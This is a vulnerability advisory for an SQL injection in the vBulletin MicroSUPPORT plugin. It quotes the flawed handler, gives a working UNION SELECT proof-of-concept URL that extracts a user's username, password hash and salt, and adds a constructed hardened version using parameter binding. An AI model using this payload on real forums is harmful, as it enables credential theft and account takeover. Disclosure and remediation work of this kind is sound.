vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest)

The vulnerability resides in the microsupport.php file. Not a single variable is sanitized; request values are used directly in the SQL queries throughout the file. An easy way to extract information from the database is to abuse the checkchatcall_request handler in that file, which looks like this:

if ($_REQUEST['requester'] == "checkchatcall_request") {
	$adminsID = $vbulletin->input->clean_gpc('r', 'adminsID', TYPE_STR);
	$chatcheck = $db->query_read("SELECT * FROM ".TABLE_PREFIX."microsupport_supportusers_online WHERE supportuserid=$adminsID");

	while($row = $db->fetch_array($chatcheck)) {
		if($row[usersUID] > 0){
			$usersid = $row[usersUID];
			$output = 'checkchatcall=1&supportuseridrequester='.$usersid;
		}else{
			$output = 'checkchatcall=0';
		}
	}
	echo $output;
}

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat function must be a number since the function checks if the usersUID is bigger than 0, which is the first column in the result.
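
A hardened form of the handler above, as an added example that is not the plugin's own code: adminsID is validated as a positive integer and bound as a query parameter instead of being concatenated into the SQL. It assumes a stand-alone PDO/SQLite table in place of vBulletin's $db object, and the function name and sample rows are constructed; inside vBulletin, requesting the value with TYPE_UINT instead of TYPE_STR gives the same integer guarantee.

```php
<?php
// Added example. Only the table name and the usersUID / supportuserid columns
// come from the page; check_chat_call() and the sample rows are constructed.
function check_chat_call(PDO $pdo, $rawAdminsId): string
{
    // Accept only a positive decimal integer. Anything else, including a
    // value with SQL appended after the number, is rejected before any query.
    $adminsId = filter_var($rawAdminsId, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($adminsId === false) {
        return 'checkchatcall=0';
    }

    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $pdo->prepare(
        'SELECT usersUID FROM microsupport_supportusers_online
          WHERE supportuserid = :id'
    );
    $stmt->bindValue(':id', $adminsId, PDO::PARAM_INT);
    $stmt->execute();

    $output = 'checkchatcall=0'; // defined even when no row matches
    while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
        $usersId = (int) $row['usersUID'];
        $output = $usersId > 0
            ? 'checkchatcall=1&supportuseridrequester=' . $usersId
            : 'checkchatcall=0';
    }
    return $output;
}

// Constructed in-memory stand-in for the plugin's table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE microsupport_supportusers_online
            (usersUID INTEGER, supportuserid INTEGER)');
$pdo->exec('INSERT INTO microsupport_supportusers_online VALUES (42, 1), (0, 2)');

// Constructed inputs: two valid ids, then a value with SQL appended.
foreach (['1', '2', '1 UNION SELECT null, null'] as $input) {
    echo check_chat_call($pdo, $input), "\n";
}
```

The third input is rejected by the integer check and never reaches the database, so the response is the same checkchatcall=0 a client gets for an id with no pending chat.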


Comments

  1. Can you fix it somehow?
